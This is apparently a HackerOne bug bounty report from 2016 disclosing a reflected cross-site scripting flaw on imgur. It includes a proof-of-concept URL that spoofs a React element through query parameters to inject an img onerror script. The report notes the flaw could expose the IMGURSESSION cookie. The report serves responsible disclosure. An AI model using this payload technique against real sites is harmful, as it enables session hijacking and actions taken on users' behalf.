Imgur: XSS via React element spoofing

2016-03-18T15:20:28
ID H1:124277
Type hackerone
Reporter jouko
Modified 2016-03-23T23:11:47

Description

Hello, I noticed an XSS on imgur. Proof of concept: visit the URL

http://imgur.com/vidgif/ticket/aaaaaaaa?error[props][dangerouslySetInnerHTML][__html]=%3Cimg%20src=a%20onerror=%22alert(%27XSS%20on%20%27%2bdocument.domain)%22%3E&error[_isReactElement]=true&error[type]=body

It's not the simplest case as it requires some React magic. There is a good explanation of this type of vulnerabilities at http://danlec.com/blog/xss-via-a-spoofed-react-element . Corresponding H1 report: https://hackerone.com/reports/49652 .

The impact is as usual. The attacker could execute operations on behalf of the victim who visits a malicious link, or access e.g. the session cookie (IMGURSESSION).

I haven't yet checked if this the only such occurrence on Imgur.